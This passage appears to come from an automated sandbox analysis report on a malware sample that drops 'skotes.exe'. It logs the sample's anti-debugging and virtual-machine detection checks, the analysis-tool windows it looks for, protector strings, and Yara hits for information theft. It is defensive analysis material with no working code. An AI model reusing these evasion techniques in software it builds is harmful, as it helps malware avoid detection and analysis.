Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: skotes.exe, skotes.exe, 00000006.00000002.3399818041.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.3400789012.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3400789012.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FQSn6sSfgS.exe, 00000000.00000002.2200630132.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2231225967.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2263056068.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3399818041.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Code function: 0_2_04D70770 rdtsc 0_2_04D70770
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A0652B mov eax, dword ptr fs:[00000030h] 6_2_00A0652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A0A302 mov eax, dword ptr fs:[00000030h] 6_2_00A0A302
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: skotes.exe Binary or memory string: r=Program Manager
Source: FQSn6sSfgS.exe, 00000000.00000002.2200630132.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2231225967.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2263056068.0000000000BC1000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: r=Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009ED3E2 cpuid 6_2_009ED3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_009ECBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009D65E0 LookupAccountNameA, 6_2_009D65E0

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 3.2.skotes.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FQSn6sSfgS.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3399736911.00000000009D1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2262912878.00000000009D1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2230041079.00000000009D1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2200211244.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY